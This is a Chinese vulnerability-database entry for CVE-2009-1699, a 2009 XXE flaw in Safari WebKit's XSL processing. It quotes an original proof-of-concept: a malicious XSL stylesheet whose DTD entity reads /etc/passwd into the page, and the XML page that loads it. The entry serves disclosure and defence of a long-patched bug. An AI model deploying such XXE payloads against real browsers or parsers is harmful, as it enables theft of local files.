Apple Safari WebKit "XSL"样式表功能文件读取和信息泄露漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117732 漏洞类型 信息泄露
发布时间 2009-05-08 更新时间 2010-02-03
CVE编号 CVE-2009-1699 CNNVD-ID CNNVD-200906-183
漏洞平台 Linux CVSS评分 7.1
|漏洞来源
https://www.exploit-db.com/exploits/33034
https://www.securityfocus.com/bid/35321
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200906-183
|漏洞详情
Safari是苹果家族机器操作系统中默认捆绑的WEB浏览器。AppleSafari"WebKit"处理XML时存在XML外部实体漏洞,远程攻击者可以通过特制DTD从用户系统读取任意文件。
|漏洞EXP
source: http://www.securityfocus.com/bid/35321/info

WebKit is prone to a remote information-disclosure vulnerability.

An attacker can exploit this issue to obtain sensitive information that may aid in further attacks.

NOTE: This issue was previously covered in BID 35260 (Apple Safari Prior to 4.0 Multiple Security Vulnerabilities), but has been assigned its own record to better document it. 

Safari prior to version 4 may permit an evil web page to steal files
from the local system.

This is accomplished by mounting an XXE attack against the parsing of
the XSL XML. This is best explained with a sample evil XSL file which
includes a DTD that attempts the XXE attack:

<!DOCTYPE doc [ <!ENTITY ent SYSTEM "file:///etc/passwd"> ] >
<xsl:stylesheet version="1.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template match="/">
  <html>
  <body>
Below you should see the content of a local file, stolen by this evil web page.
<p/>
&ent;
<script>
alert(document.body.innerHTML);
</script>
  </body>
  </html>
</xsl:template>
</xsl:stylesheet>

To mount the attack, the attacker would serve a web page which has XML
MIME type and requests to be styled by the evil stylesheet:

<?xml version="1.0" encoding="ISO-8859-1"?>
<?xml-stylesheet type="text/xsl" href="safaristealfilebug.xsl"?>
<xml>
irrelevant
</xml>

Full technical details: http://scary.beasts.org/security/CESA-2009-006.html

Blog post: http://scarybeastsecurity.blogspot.com/2009/06/apples-safari-4-fixes-local-file-theft.html
(includes 1-click demos)

Cheers
Chris
|受影响的产品
WebKit Open Source Project WebKit 0 Ubuntu Ubuntu Linux 9.04 sparc Ubuntu Ubuntu Linux 9.04 powerpc Ubuntu Ubuntu Linux 9.04 lpia Ubuntu Ubuntu Linux 9.04 i386 Ubuntu Ubu
|参考资料

来源:VUPEN
名称:ADV-2009-1522
链接:http://www.vupen.com/english/advisories/2009/1522
来源:support.apple.com
链接:http://support.apple.com/kb/HT3613
来源:APPLE
名称:APPLE-SA-2009-06-08-1
链接:http://lists.apple.com/archives/security-announce/2009/jun/msg00002.html
来源:VUPEN
名称:ADV-2009-1621
链接:http://www.vupen.com/english/advisories/2009/1621
来源:BID
名称:35321
链接:http://www.securityfocus.com/bid/35321
来源:BID
名称:35260
链接:http://www.securityfocus.com/bid/35260
来源:MILW0RM
名称:8907
链接:http://www.milw0rm.com/exploits/8907
来源:support.apple.com
链接:http://support.apple.com/kb/HT3639
来源:SECUNIA
名称:35379
链接:http://secunia.com/advisories/35379
来源:MISC
链接:http://scarybeastsecurity.blogspot.com/2009/06/apples-safari-4-fixes-local-file-theft.html
来源:MISC
链接:http://scary.beasts.org/security/CESA-2009-006.html
来源:OSVDB
名称:54972
链接:http://osvdb.org/54972
来源:APPLE
名称:APPLE-SA-2009-06-17-1
链接:http://lists.apple.com/archives/security-announce/2009/Jun/msg00005.html